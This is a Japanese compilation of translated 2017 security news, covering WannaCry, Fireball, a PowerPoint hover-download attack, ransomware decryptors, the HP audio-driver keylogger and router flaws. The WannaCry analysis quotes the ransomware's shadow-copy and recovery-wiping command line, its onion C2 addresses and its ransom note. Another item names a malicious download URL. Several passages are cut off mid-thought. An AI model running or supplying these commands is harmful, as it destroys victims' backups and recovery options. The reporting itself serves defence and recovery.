 WannaCry身代金要求型マルウェアが世界中の数十万のコンピュータを撃滅した後、我々はFireballと名付けられた別の危険なマルウェア キャンペーンが台頭していることを目撃している。セキュリティ企業Check Point のThreat Intelligenceは、大量の脅威(世界中の2億5000万を超えるコンピュータに感染)を発見した。
 これは、Fireballが、ユーザを悪意あるWebサイトに振り向けたり、マルウェアの投下を実施したり、犠牲者をスパイしたりする先進的な能力を持っていることを意味している。Fireballの設計は先進的であり、回避テクニックとマルチレイヤー アンチ検出テクニックを含んでいる。更に、Fireballはまた、フレキシブルなC&Cサーバを持っている。
Fireballに感染しているか否か確認するには? 
 あなたがFireballに感染しているか否かチェックできるように、Check Pointは、幾つかの簡単なポイントを提示している。以下に尋ねられている質問の答えが No であれば、あなたはアドウェアに感染している可能性がある。
 最初に、Webブラウザを開きなさい。
 殆どのアドウェアを削除するには、コンピュータから単純にそのアプリケーションを削除するだけである。Windowsでは、Windowsのコントロールパネルから、プログラムの追加と削除 / プログラムと機能 で実行することができる。Macでは、Finderで、そのアプリケーションを探しだし、その疑わしいプログラムをTrashにドラッグする。コチラ を参照しなさい。
リンクにマウスをホバー(かざした)時、PowerPointファイルは、マクロを要求することなくマルウェアをダウンロードする  BleepingComputer : News>Security (2017/06/02) 
ブービートラップされたPPSXファイルを配布しているスパム メール(画像をクリックすると拡大します)
 前略
 5月31日(水)にロンドンからサリーへの器材の移動に関する注文書をご確認ください。
 草々
Nasim Khan , E-Pharm Limited
Phone : +44 (0) 203 3002245
 これらPPSXファイルは、開いた時に、PowerPoint編集モードの代わりに、PowerPointの発表者ビューになることを除いて、PPTXファイルと全く等しい。
PPSXファイルのコンテンツ
 ユーザがこのURLにマウスをホバーすると必ず、悪意あるコードが実行され、PowerShellが起動され、以下のコードを実行しようとする。
悪意あるコード[難読化されている](画像をクリックすると拡大します)
悪意あるコード[難読化解除](画像をクリックすると拡大します)
 ユーザがOfficeインストレーションを、保護ビュー セキュリティ機能を有効にして使用していたなら、Officeは、攻撃の実行を停止するだろう。
Officeの保護ビューが、悪意あるコードの実行を停止
 保護ビューを無効にしているユーザや、ユーザがポップアップを無視しコードの実行を許可した時には、悪意あるPowerShellコードが、http://cccn.nl/c.php に接続を企て、別のファイルをダウンロードするだろう。
Office保護ビューは、「リンク ホバー」テクニックから保護する 
 Bleeping Computerのコンタクトに対して、Microsoftのスポークスマンは、この攻撃ベクトルに関する詳細な情報を提供した。
 Officeの保護ビューは、Defaultで有効になっている。そして、このレポート中で説明されているテクニックに対して防御する。Windows DefenderとOffice 365のAdvanced Threat Protectionも、このマルウェアを検出し削除する。我々は、ユーザが適切なコンピューター習慣をオンラインで実践するよう促しており、コンテンツを有効にしたり、Webページヘのリンクをクリックしたりした時、注意するようにしている。
 Microsoftが、彼等のステートメントで発言しているように、Office ProtectedがDefaultで有効になっているので、Officeは、このテクニックに対して防御する。この機能をOFFにしていることを認識しているユーザや組織は、この攻撃ベクトルを考慮に入れるように、彼等のポリシーを検証する必要がある。
IOCs 
PowerPointファイル: 
第二ステージ EXE: 
WannaCryに開発エラー、ファイル復元の可能性  Kaspersky : ThreatPost (2017/06/01) WannaCry は、5月12日に、NSA(米国国家安全保障局)が武器化したEternalBlueエクスプロイト を利用して150カ国のコンピュータを感染させ、世界中に大損害を発生させたが、これは、身代金要求型マルウェアの高級品 であったことを意味してはいない。レポート を公開した。この二つのエラーは、管理組織が、失ってしまいそうなファイルを復元するために入手可能な復元ソフトウェアを使用することを可能にするものである。
 しかしながら、ファイルがローカルドライブ上の他の場所に保存されていた場合は、それらのファイルは上書きされずに、削除されるだけなので、復元ソフトで復元できる可能性があると、この研究者達は発言している。
 研究者達は、WannaCryによって暗号化されたファイルの復号プログラムの構築に取り組んでいた。QuarksLabのAdrien Guinetは、このマルウェアによってローカルに格納されたRSA公開鍵を因数に分解するのに用いられるメモリから素数を復元 できるWannaKey と呼ばれるツールを構築しリリースした。この公開鍵は、暗号化されたファイルに使用された秘密鍵を再構築するために使用することができると、Guinetは発言している。彼は更に、Benjamin Delpyによって構築されたWanaDecrypt と呼ばれるツールを使用することで成功したと付け加えている。Delpyの発言によると、彼はまた、Windows XPとWindows 7で動作するWanakiwi と呼ばれる別の復号プログラムを構築している。
Linuxのsudoコマンドの脆弱性に対するパッチが利用可能になった  Kaspersky : ThreatPost (2017/05/31) 警告 は、システムでSELinux(【訳注】 アメリカ国家安全保障局 (NSA) がGPL下で提供しているLinuxのカーネルに強制アクセス制御 (MAC) 機能を付加するモジュールの名称であり、Linuxのディストリビューションではない(Wikipediaより))が有効になっており、sudoがSELinuxサポートと共に構築された場合に、この脆弱性が引き金となると発言している。sudo 1.8.6p7 から 1.8.20 が影響を受ける。ユーザは、sudo 1.8.20p1 にアップデートしなければならない。Debian のwheezy, jessie, sidやSUSE  Linuxの幾つかの製品を含む他のディストリビューションが修正をリリースしたのと同様に、Red Hatは、Red Hat Enterprise Linux 6, Red Hat Enterprise Linux Server, Red Hat Enterprise Linux 7用の修正を昨日リリース したと発言している。アドバイザリ で記述している。
SIOSセキュリティ ブログより引用 
主なディストリビューションの対応方法
詳細は、各ディストリビューションの提供元にご確認ください
Red Hat Enterprise Linux/CentOS
ubuntu
SUSE/openSUSE
Microsoftが、先週Malware Protection Engineの沢山のバグをパッチしていた  The Register : Security (2017/05/29) 発表 では8つの個別のバグが記述されている。CVE-2017-8535 , CVE-2017-8536 , CVE-2017-8537 , CVE-2017-8538 , CVE-2017-8539 , CVE-2017-8540 , CVE-2017-8541 , CVE-2017-8542 である。コチラ のProject Zeroで説明されている。
Microsoftのマスター ファイル テーブルのバグは、Windows 7、8.1をBSODにする脆弱性が存在している  The Register : Security (2017/05/29) コチラ (ロシア語)に発見に関して主張している。忠告している 。
Wallet身代金要求型マルウェアのマスターキーがBleeping Computerにリリースされた。Avastが無料の復号ツールをリリース  BleepingComputer : News>Security (2017/05/18) lightsentinelone と名乗るメンバーが、Dharma Ransomware Support Topic に米国東部時間9:13(日本時間、5月18日 22:15)に作成したものであり、Pastebinへのリンク を含んでいた。
 リリースされたWalletキーに関するBleepingComputer.comへの投稿
 このPastebinへの投稿は、正当なものと確認された198の復号キーを含むCヘッダーファイルで構成されており、Wallet身代金要求型マルウェア復号プログラムを作成するためにセキュリティ研究者によって使用された。
 Dharma感染色分け地図
 そこで、あなたが身代金要求型マルウェアに感染し、身代金を支払う意思がないのであれば、将来復号プログラムがリリースされた場合に備えて、あなたの暗号化されたファイルを安全な場所に格納しておきなさい。Dharma Ransomware Help & Support Topic で、我々に知らせなさい。
何故Wallet身代金要求型マルウェアの開発者は復号キーをリリースしたのか? 
 Walletの属する身代金要求型マルウェアのCrysisファミリーは、彼等が新しい拡張子に切り替えた時、それまでの変種のマスター復号キーをリリースすることを常としている。例えば、2016/11/14、Crysisマスター復号キーは、BleepingComputer上にリリース された。2017/03/01、DharmaキーがBleepingComputer上にリリース された。そして本日、我々は、Walletのキーをリリースされた。
Crysis用のAvast復号ツールを使用してWalletを復号する方法(Onionも可能かもしれない) 
アップデート(2017/05/20):  リリースされたマスター復号キーは、.onion変種で感染した人の一部を復号しているかのようである。従って、あなたが、.onion拡張子で構成されるファイル暗号化に感染しているのであれば、あなたのファイルに関して動作する可能性があるので、この復号ツールを試すべきである。
 Wallet身代金要求型マルウェアの犠牲者は、ファイルが、[filename].[email].walletの形式に暗号化され、リネームされていることで同定することができる。たとえば、最近の変種は、test.jpgと名付けられていたファイルを、test.jpg.[destroed_total@aol.com].walletとして暗号化している。
 Walletで暗号化されたファイル
 わたしはまた、この記事の末尾に、完全なeMailアドレスのリストを含めた。ID-Ransomeware のMichael Gillespie に感謝する。http://files.avast.com/files/decryptor/avast_decryptor_crysis.exe )から、AvastのCrysis Decryptorを最初にダウンロードする。
 Crysis用Avast復号ツール
 開始する前に、必ず、Wallet身代金要求型マルウェアの本日リリースされたキーをサポートしているバージョンである 1.0.103.0 を使用していることを確認する必要がある。この復号ツールのバージョンをチェックするには、上の画像中に見られるプログラムのタイトルバーに注目しなさい。あなたが正しいバージョンを使用しているのであれば、進行するためにNextボタンをクリックしなさい。
 Crysis用Avast復号ツール
 上の画面で、未だ選択されていないドライブを追加し、次にNextボタンをクリックする。
 復号オプション画面
 この二つのオプションをチェックしたままにして、ファイルの復号を開始するためにDecryptボタンをクリックする。この復号プログラムは管理者権限で実行する必要があるので、UACプロンプトが表示され、このまま実行するか否か尋ねられるだろう。安全なので、このプロンプトではYesを押す。
 ファイル復号中
 このプロセスには大変な時間がかかるので、この復号プログラムが、コンピュータをスキャンし、ファイルを復号している間は我慢しなさい。どの位の時間がかかるのかの目安としては、私のテスト コンピュータは大変僅かなファイルしか持っていなかったが、30分以上かかった。コンピュータが多くのファイル(特に大きなファイル)を持っている場合には、このプロセスは大変長い時間が掛かるだろう。
 復号完了
 あなたのファイルは復号されたが、オリジナルの暗号化されたファイルは依然としてあなたのコンピュータに残存している。ファイルが適切に復号されたことを確認したら、あなたの暗号化されたファイルの全てを特定のフォルダに移動するためにCryptoSearchを使用しなさい。これで、それらを削除したりアーカイブしたりすることができる。
 これで、この復号プログラムを終了することができ、あなたのコンピュータを通常通り使用することができる。この復号プログラムの使用に支援を必要とするのであれば、Dharma Ransomware Help & Support Topic で質問しなさい。
既知のWallet eMailアドレス 
3048664056@qq.com
 
BTCWare身代金要求型マルウェアのマスターキーがリリースされ、無料復号ツールが利用可能になった  BleepingComputer : News>Security (2017/05/16) リリース した。このユーザ(彼自身はchecker123と名乗っている)が、BTCWare身代金要求型マルウェアの作者なのか、彼等のライバルを妨害しようとする競合する身代金要求型マルウェア チームのメンバーなのか定かでないが、何れにせよ我々は嬉しく思う。たとえ、彼が我々のコメントの要請に対応しなくとも、我々は、checker123が、この身代金要求型マルウェアの作者であると思っている。
BTCWareは大変アクティブな身代金要求型マルウェア株である 
 BTCWare身代金要求型マルウェアは、セキュリティ研究者MalwareHunter とKarsten Hahn が、その最初のバージョン(当初CrptXXX として知られていた)を偶然見つけた3月初旬に、マルウェアシーンにその存在を印象づけた。
 CrptXXX脅迫文
 我々が後にBTCWareあるいはCryptoByteと呼び始めた新しいバージョンが一週間後現れ、そして、その後に新し変種が現れた。
 BTCWare脅迫文(画像をクリックすると拡大します)
 CerberやSporaほど流行していないが、BTCWareは、殆どの人々が考えているより成功している。ID-Ransomwareサービスによって提供された、この感染図表に基づくと、この身代金要求型マルウェアは、一日平均凡そ10感染している。これは、SageやLockyのような、もっと有名な同種のマルウェアの一部と同じレベルである。
 BTCWare感染統計(画像をクリックすると拡大します)
 2017年4月初旬での身代金要求型マルウェア感染統計(画像をクリックすると拡大します)
 発見されて以来、我々は三つのメジャーなBTCWareバージョン(それらが暗号化したファイルの末尾に追加したファイル拡張子で識別可能)を見てきた。
.[< email address >].btcware
 これらの二つに関しては、セキュリティ研究者Francesco Muroni が既に、暗号をブルート・フォースし、復号キーを取得するスクリプトを作成している。この二つとは、.btcware と .crptobyteである。このスクリプトは、コマンドラインを使用することから通常ユーザが使用するのは難しかったので、セキュリティ研究者Michael Gillespie は、見栄えのするGUIを作成した。
 checker123が、BTCWareマスターキー(全ての犠牲者用の普遍的復号キー)をリリースした後、Gillespieは、その有効性をテストし、.btcware と .cryptowinの変種に関しても動作することを発見した。コチラ をクリックして復号プログラムをダウンロードできる。以下は、Michaelの指示である。
 あなたのキーを抽出するためには、暗号化されたファイルと、そのオリジナルのファイルの両方を必要とする。Settings -> Find Key に移動し、このファイルをロードする。次に、ブルート・フォースを開始する。このプログラムがキーを発見すると、ダイアログが閉じ、キーがロードされる。これで、選択されているディレクトリを復号するための準備ができた。
復号プログラムはOnyonware用のサポートを追加してアップデートされるだろう 
 この記事は当初、5月4日に記述されたが、Gillespieが、この復号プログラムの最適化作業をしていたために公開されなかった。更に時が経ち、BTCWareのマスターキーが我々のフォーラムにリークされた理由が明らかになった。新しいバージョン にアップデートした。更に、昨日(5月15日)、彼/彼等は、Onyonwareと名付けられた 新しい身代金要求型マルウェアを作成し起動した。Gillespieは確認した 。この研究者は、彼が4番目のBCTWareバージョンを解決できるか否か、依然として調査している。
【訳注】 この後、checker123によるフォーラムへのポスト等が続きますが、省略します。
Wana Decryptor / WannaCrypt0rnによる巨大攻撃について  BBC:Technology / BleepingComputer:News>Security (2017/05/13) 
BBCから(日本時間、8:00頃にリリースされた記事から) 
 米国国家安全保障局によって開発されたと信じられているツールを使用した巨大なサイバー攻撃が世界中の組織を攻撃している。
BleepingComputerが、日本時間、5:00頃にリリースした記事から 
 感染している国のチャート。
 画像をクリックすると拡大します
地に落ちたWana Decryptor / WannaCrypt0rn技術(BleepingComputerより、全文和訳) 
 Telefonica(テレフォニカ。【訳注】 スペイン・マドリードに本拠を置く大手通信事業者)、中国の大学群、ロシア内務省、他の組織に巨大な身代金要求型マルウェアを急激に増加させることにより世界中に嵐を見舞ったことにより、本日は、WannaCrypt0r身代金要求型マルウェアにとって重要な日となった。BleepingComputerが、この勃発を詳細にカバーすることで、このマルウェアを取り扱う可能性のあるIT分野の人々が、このマルウェアの動作方法の基本を理解をすることが、WannaCrypt0r身代金要求型マルウェアを低下させるための適切な考えであると、私は思う。WannaCrypt0r Wana Decrypt0r Help & Support Topic をセットアップしている。
この身代金要求型マルウェアは、WannaCryptor, WannaCrypt0r, Wana Decrypt0rと呼ばれている 
 この身代金要求型マルウェアの公式の内部名はWannaCrypt0rであるが、あなたが、このマルウェアを別名で呼んでいる新しい記事を読むことがあるだろう。これは、この身代金要求型マルウェアが、Wana Decrypt0r 2.0と呼ばれるロックスクリーン/復号プログラム を持っていることによる。このプログラムは、全ての犠牲者が、感染させられたデスクトップ上に見るものであり、異なる内部名であり、WNCRY拡張子でファイルを暗号化している。
WannaCrypt0rは、どのように拡散しているのか? 
 MalwareHunterTeam は、数週間前に最初にWannaCrypt0r見つけたが、この身代金要求型マルウェアは、この数週間の間の大部分に関して、殆ど拡散しなかった。突然、WannaCrypt0rは爆発し、ETERNALBLUEと呼ばれるエクスプロイト (【訳注】 スクリプト、あるいはプログラムの1つで、コンピュータ関連においてソフトウェアやハードウェアの脆弱性を利用し、悪意を持った行為のために書かれたもの(IT用語辞典より))を介して燎原の火の如く拡散し始めた。ETERNALBLUEは、米国安全保障局のエクスプロイトであると言われ、The Shadow Brokerと呼ばれるハッキンググループによって先月オンラインにリークされた 。MS17-010 )していたにも拘わらず、多くの人々は、このパッチをインストールしていなかったようである。
WannaCrypt0rは、どのようにコンピュータを暗号化しているのか? 
 コンピュータがWana Decrypt0rに感染すると、このインストーラは、同じフォルダ中にある埋め込まれたファイルを解凍する。この埋め込まれたリソースは、パスワードで保護されたZIPファイルであり、WannaCrypt0rによって使用され実行される様々なファイルを含んでいる。
 埋め込まれているパスワードで保護されたZIPファイル(画像をクリックすると拡大します)
 WanaDecrypt0rローダーは、このZIPファイルのコンテンツを、このローダーと同じフォルダに解凍し、幾つかのスタートアップ タスクを実行する。これは最初に、msgフォルダに、ローカライズされた(【訳注】 犠牲者の国の言語に対応した)脅迫文を抽出する。現在サポートされている言語は以下である。
ブルガリア語、中国語(簡字体、繁字体)、クロアチア語、チェコ語、オランダ語、デンマーク語、英語、フィリピン語
 次に、WannaCrypt0rは、https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zipからTORクライアントをダウンロードし、TaskDataフォルダに解凍する。このTORクライアントは、gx7ekbenv2riucmf.onion, 57g7spgrzlojinas.onion, xxlvbrloxvriy2c5.onion, 76jdd2ir2embyv47.onion, cwwnhwhlz52maqm7.onionで、この身代金要求型マルウェアのコマンド&コントロール サーバと通信するために使用される。
taskkill.exe /f /im mysqld.exe
 これで、Wana Decrypt0rは、コンピュータ上のファイルの暗号化を開始する準備ができた。ファイルを暗号化している時、Wana Decrypt0rは、以下の拡張子を持っているファイルだけを暗号化する。
.der, .pfx, .key, .crt, .csr, .pem, .odt, .ott, .sxw, .stw, .uot, .max, .ods, .ots
 ファイルが暗号化されると、この身代金要求型マルウェアは、ファイルが暗号化されたことを意味する .WNCRY 拡張子を暗号化したファイルに追加する。例えば、test.jpgファイルが暗号化されると、test.jpg.WNCRYに名前が変わる。
 WNCRY暗号化されたファイルのフォルダ(画像をクリックすると拡大します)
 ファイルを暗号化している時、Wana Decrypt0rはまた、@Please_Read_Me@.txt脅迫文と、ファイルを暗号化した全てのフォルダに@WanaDecryptor@.exe復号プログラムのコピーを格納する。我々は後で、これらのファイルを見るだろう。
C:\Windows\SysWOW64\cmd.exe /c vssadmin delete shadow /all /quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
 これらのコマンドは管理者権限を必要とするので、犠牲者は以下に見られるようなUAC(ユーザーアカウント制御)プロンプトを表示されるだろう。
 ユーザーアカウント制御
 最終的に、Wana Decryptor 2.0ロック画面が表示される。この画面は、身代金の支払い方法と、あなたが上にリストした言語の一つを選択することが可能であるという追加情報を含んでいる。
 Wana Decrypt0r 2.0ロック画面(画像をクリックすると拡大します)
 あなたが、Check Paymentボタンをクリックすると、この身代金要求型マルウェアは、支払いが実行されているか否か確認するためにTORコマンド&コントロール サーバへの接続を回復させる。支払いが実行されていれば、この身代金要求型マルウェアは、自動的にあなたのファイルを復号する。支払いが実行されていない場合は、以下のような対応を見ることになる。
 支払いが実行されていない場合の対応
 WannaCrypt0r身代金要求型マルウェアは、三つのハードコードされたBitcoinアドレスを持っている。これらのBitcoinアドレスは、13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 , 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw , 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn である。私は何かを見落としているかもしれないが、私が理解できないことは、大変多くの人々が同じBitcoinアドレスを使用したなら、この身代金要求型マルウェアの開発者は、どのようにして、支払っていない犠牲者と支払いをした犠牲者を識別することが可能なのかということである。
 Contuct Usのフォーム
 また、この身代金要求型マルウェアは、あなたのデスクトップ壁紙を、以下に示す別の脅迫文に差し替えるだろう。
 デスクトップ壁紙(画像をクリックすると拡大します)
 大事なことを言い忘れていたが、脅迫文は、詳細情報とFAQ(よくある質問)の回答を含んでデスクトップ上に放置されるだろう。
 @Please_Read_Me@.txt脅迫文(画像をクリックすると拡大します)
 先述したように、残念ながら、この身代金要求型マルウェアは無料で復号することができない。あなたの最善の処置はバックアップから修復することである。もしもバックアップが存在しないのであれば、この身代金要求型マルウェアが、適切にシャドー・ボリューム・コピーを削除していないことに一縷の望みを抱いてShadow Explorer のようなプログラムを試すことである。ユーザがUACプロンプトでYesをクリックしなかった人々は、修復可能なチャンスが存在している。How to recover files and folders using Shadow Volume Copies に発見される。WannaCrypt0r Wana Decrypt0r Help & Support Topic をセットアップしている。
Wana Decrypt0rを、どのようにして防御すればいいのか? 
 新しい脅威からあなたを保護するために挙動防御を活用するセキュリティソフトウェアをアップデートすることとは別に、あなたのコンピュータに最新のWindowsセキュリティ アップデートの全てをインストールしておくことは回避できないことである。一部の企業に関して、最新のセキュリティアップデートが出現した時それらをインストールすることが、彼等の「パッチの管理指針」の一部ではないことを、私は認識しているが、疑われている米国国家保安局のリモート・エクスプロイトを修正するアップデートは、当に優先されなければならない。Microsoftのセキュリティ・ブレティンMS17-010 で論議されているアップデートはインストールしなければならない。セキュリティ研究者Bart はまた、SMBv1は最先端のWindowsでは必ず使用しなければならないものではないので、SMBv1を無効にするように推奨している。SMBv1を無効化する方法に関しては、同様にMS17-010ブレティン中に見出すことができる。
 素晴らしい挙動検出付きのソフトウェア製品に関しては、私は、Emsisoftの挙動ブロック・コンポーネントであるEmsisoft Anti-Malware を強く推奨する。あなたは大きな安心を得るだけでなく、彼等の挙動ブロッカーは、新しい0-Dayの身代金要求型マルウェアがコンピュータを暗号化することを妨げることに驚くべき実績がある。
 残念ながら、この挙動ブロッカーは有料版でのみ利用可能なので、この機能の便益を享受するには、Emsisoft Anti-malwareを購入する必要がある。Emsisoft Anti-Malwareを購入 すると、我々は歩合をもらうことができる。そう云う訳で、私がこのプログラムを信じており、身代金要求型マルウェアや他のマルウェアから、あなたを防御する大変素晴らしい仕事を実行できることから、私はEmsisoft Anti-malwareだけを推奨する。
IOC 
Hashes 
Wana Decrypt0r / WannaCrypt0r関連ファイル 
Wana Decrypt0r / WannaCrypt0r関連レジストリ エントリ 
Wana Decrypt0r / WannaCrypt0r通信ネットワーク 
Wana Decrypt0r / WannaCrypt0rロック画面テキスト 
Can I Recover My Files?
How Do I Pay?
Contact
If you need our assistance, send a message by clicking .
We strongly recommend you to not remove this software, and disable your anti-virus for a while, until you pay and the payment gets processed. If your anti-virus gets updated and removes this software automatically, it will not be able to recover your files even if you pay!
Wana Decrypt0r / WannaCrypt0r脅迫文 
A:  Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
Q:  What do I do?
A:  First, you need to pay service fees for the decryption.
Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software.
    
Q:  How can I trust?
A:  Don't worry about decryption.
   
*   If you need our assistance, send a message by clicking  on the decryptor window.
暗号化されたファイルの拡張子 
ヒューレットパッカード(HP)のラップトップのオーディオドライバにキーロガーが発見された  BleepingComputer : News>Security (2017/05/11) 発見 を本日公開した。
このキーロガーはプレインストールされているオーディオドライバ中に発見された 
 研究者によると、このキーロガー機能は、Conexant HDオーディオドライバ パッケージのバージョン1.0.0.46及びそれ以前の中に発見される。
オーディオドライバはローカルAPIを介してリアルタイムにキーストロークを露わにする 
 このファイルが存在していない、あるいは、このファイルのパスを含むレジストリキーが存在していなかったり、損壊している場合、このオーディオドライバは、全てのキーストロークをローカルAPI(OutputDebugStringと名付けられているAPI)に渡す。
キーロガー機能が確認されたHPラップトップ 
 modzeroの研究者は、Conexant HDオーディオドライバ パッケージが、HPの28のモデルにプレインストールされていたと発言している。このドライバを使用している他のハードウェアは、影響を受けることはないかもしれないが、調査した者は、この問題が他のコンピュータメーカーに影響を与えることを公式には確認していない。
HP EliteBook 820 G3 Notebook PC 
 このConexant HDオーディオドライバ パッケージは、以下のオペレーティングシステム用のバージョンがある。
Microsoft Windows 10 32-Bit 
 HPは、この記事を公開する時点でBleeping Computerからのコメントの要求に対して応答していない。
HP MicTray64 Keyloggerをチェックし削除する方法 
 modzeroによると、以下のステップに従うことで、HP MicTray64.exeキーロガーをチェックし削除することができるとしている。
1. Task Manager(タスクマネージャ)を開き、MicTray64.exeと呼ばれるプロセスが実行中であるかを確認する。このプロセスが存在している場合には、終了させる。 
 このステップに従ったなら、このキーロガーは最早アクティブにならないし、再起動で起動することもなくなる。
ASUS RTワイアレスルータ所有者は、Webハイジャックのバグにパッチをあてなさい  The Register : Security (2017/05/11) CVE-2017-5891 とラベルされたこの設計上のポカは、バージョン 3.0.0.4.380.7378 より古いファームウェアを使用している RT-AC と RT-N 製品系列に存在している。説明していた 。CVE 2017-5892 。【訳注】 バージョン3.0.0.4.380.7378より古いファームウェアを搭載したASUS RT-AC* と RT-N* デバイスは、ネットワークマップのようなJSONP情報開示を可能にするバグ(Common Vulnerabilities and ExposuresのDescriptionの和訳))は、修正を必要とするほどの深刻さはないと考えているようである。また、このアップデートされたファームウェアは、以下を修正している。
 未だパッチしていないのであれば、パッチしなさい。
Update  BleepingComputerが先程UPした記事に脆弱性のある型番とダウンロードサイトへのリンクが記載されていましたので、追記しておきます。
ファームウェア ダウンロードは、コチラ から。
脆弱性のあるルータの型番は以下。
RT-AC51U 
ニュース ブリーフ: 身代金要求型マルウェアBitKangorooは、支払いをしない場合には、ファイルを削除する  BleepingComputer : News>Security (2017/05/08) Michael Gillespie の BitKangarooDecrypter を使用して無料で復号することができる。
 BitKangoroo身代金請求画面(画像をクリックすると拡大表示されます)
 この身代金要求型マルウェアは、現在開発下にあるので、デスクトップ上のファイルしか暗号化しない。犠牲者が間違った復号キーを入力すると、暗号化されたファイルの全てを削除する非作動コードを含んでもいる。あなたが上図の Decrypt my files ボタンをクリックした時に表示される警告メッセージは以下である。
 ファイル削除警告(復号キーは間違いないか? キーを挿入できるのは一回だけだ。間違っていれば、全てのファイルは削除される)
 以下に暗号化したファイルの全てを削除するコードを示す。
 ファイル削除用のコード
 最後に、この身代金要求型マルウェアの画面は、クリックすると、この身代金要求型マルウェアの開発者にeMailするためのフォームを開くラベルを含んでいる(【訳注】 一番上の図の一番下、Click me to write the email!)。現在使用されているeMailは、bitkangoroo@mailinator.com であり、以下に、このeMailの例を示す。
 身代金要求型マルウェア開発者へのeMail(画像をクリックすると拡大表示されます。Warning以下に注意してください。直上の文字列を削除するな、とあります。)
 この身代金要求型マルウェアの状況が変化したら、私はこの記事をアップデートする。
IOCS 
Hashes 
SHA256: 810f9bff502d2c9a98164201590eed5ff2cc96cd42a5d6008af93ecfc8bf9c13
関連ファイル 
%UserProfile%\AppData\Roaming\IEAgent.exe
関連eMail 
bitkangoroo@mailinator.com
Googleの研究者が、Windows中にワームの侵入を可能にする「あまりにも酷い」脆弱性を発見した  BleepingComputer : News>Security (2017/05/08) Update : (米国時間)昨晩遅く、Microsoftは、この「あまりにも酷いバグ」を修正する緊急のパッチをリリースしています。こちらのアドバイザリ を参照して、適切に対処してください。
 Googleのセキュリティ専門家がWindows OS中に深刻なリモートコード実行(RCE)のバグを発見した。このバグは、「あまりにも酷い」ものとして説明されている。
- 攻撃者と犠牲者は、必ずしも同一のLANに存在している必要はない。 
 このツイートは、2017年5月の定例パッチ(明日、5月9日に予定されている。【訳注】 日本は5月10日(水))の数日前に出現した。この研究者達は、この脆弱性は今月パッチされるかもしれないと仄めかし、そうなれば、レポートが来るだろうと、そして、彼等が彼等の発見を自由に公開するだろうと、発言している。
マルウェアの制作者は検出回避を願ってジャンク データでバックドア トロイを膨らましている  BleepingComputer : News>Security (2017/05/01) 
123マルウェア プログラマは三つのマルウェアファミリーの背後にいる 
 レポートによると、プログラマ123は、少なくとも三つのマルウェアファミリー(夫々、XXMM, ShadowWali, Wali)を陰に存在している。Wailレポート の2週間後、Cybereasonのセキュリティ研究者が別のバックドアを発掘した。これは、Wailと多くの機能が共有されているためにShadowWail と名付けられた。
ShadowWailは、Wailの早期のバージョンに大変類似している 
 研究者は、2015年から、Waliによる攻撃の直前である2016年の半ばにかけて、ShadowWaliで日本企業が攻撃されていたことを明らかにした。
ShadowWailやWaliはジャンク データで膨らまされている 
 ShadowWailとWaliは共に、内部に大きなファイル(50から200MBの範囲)をパッキングしている。ShadowWailとWaliにパッキングされているデータの殆どは、なんの目的もないジャンク データである。殆どのマルウェアは通常非常に小さい(僅か数キロバイトで、メガバイト レベルのものは非常に稀)ので、これは奇妙なことである。
ShadowWail/Waliはパスワードをダンプするプログラムをダウンロードするために使用されている 
 感染したコンピュータに、ShadowWaliもしくはWaliがインストールされると、このマルウェアは、それ自体を他のプロセスに挿入する。殆どの感染では、選択されるプロセスは、Internet Explorer(iexplorer.exe)であるが、このマルウェアは、Windows Explore(explorer.exe)や、Local Security Authority Subsystem Service(lsass.exe)に挿入されていたケースがあった。
研究者はShadowWaliビルダーのベールを剥いだ 
 Cybereasonの専門家の更なる調査は、このマルウェアをアッセンブルするために使用されたShadowWaliビルダーと思われるユーティリティを明らかにした。
xxmm2_builder インターフェース
xxmm2_builder - 最初のボタンのオプション
xxmm2_builder - 二番目のボタンのオプション
xxmm2_builder - 三番目のボタンのオプション
 "xxmm2_build"と名付けられている場合でも、このビルダーの出力は、XXMMバックドアよりもむしろ、ShadowWaliのサンプルにより一致していると、CybereasonのAssaf Dahanは発言している。
 
SamusunスマートTVは、Wi-Fiダイレクト機能を介してハックされる  BleepingComputer : News>Security (2017/04/26) 
SamusunスマートTVは認証にMACアドレスを使用している 
 Nesesoの研究者は、Samusunが、ユーザ認証にMACアドレスを使用しているだけなので、この規格の実装は失敗していると主張している。他のベンダは、プッシュボタンやPINに基づいたより確固たる認証システムを使用している。レポート に記述している。
このスマートTVは他のハッキングのためのエントリーポイントとして使用可能 
 更に、彼等は、攻撃者がユーザや企業のプライベートネットワークへのエントリーポイントとして、このTVへのアクセスを使用できることに異議を唱えている。攻撃者は、このTVが接続されているWi-Fiネットワーク用のログイン認証をダンプすることができ、そして、他のデバイスに移動することができる。
Samusunは「セキュリティ上の脅威」ではないと発言している 
 3月中旬、NesesoにコンタクトされたSamusunは、この問題を「セキュリティ上の脅威」と見なしていないとNesesoに告げ、この機能はセキュリティ上のリスクと見なしていない、そして、ファームウェアのアップデートを提供することはないと回答していた。Tizen中に40の0-Dayの脆弱性 を公開した。このTizenは、SamusunスマートTVで稼働しているオペレーティングシステムである。このフローは、彼等がレポートした時点で、全て未パッチのままである。
Microsoft EdgeにCookieとパスワード盗難の脆弱性  BleepingComputer : News>Security (2017/04/24) 
この脆弱性は攻撃者にEdgeのSOP(同一生成元ポリシー)防御をバイパスすることを可能にしている 
 今日、Caballeroが頭痛を誘発する技術記事 で公開したこのフローは、攻撃者が、データURI、meta refreshタグ、about:blankのようなドメインレス ページと協力して悪意あるコードをロードし実行することを可能にするものである。攻撃ビデオ をレコーディングしている。1 , 2 , 3 ]が、我々は、人々がTwitterのCookieやパスワードをサイトにダンプされるのは恐怖であると推測する。ダウンロード用のデモ を提供しているので、他の人はソースコードを調査し、彼等のパスワードやCookieが何処にもアップロードされていないことを確認することができる。
悪意ある広告は攻撃を自動化することができる 
 このセキュリティ研究者は、攻撃者が他のオンラインサービス(Facebook、Amazon等)のパスワードやCookieをダンプさせるようにカスタマイズすることができると発言している。このフローは、UXSS/SOPバイパスが、何方かといえば各ブラウザ固有であるために、Edgeだけが影響を受ける。
Webrootアンチウィルスが発狂した! Windowsのシステムファイルを悪意あるものとして判定している  BleepingComputer : News>Security (2017/04/25) 
WebrootはFacebookへのトラフィックもブロックした 
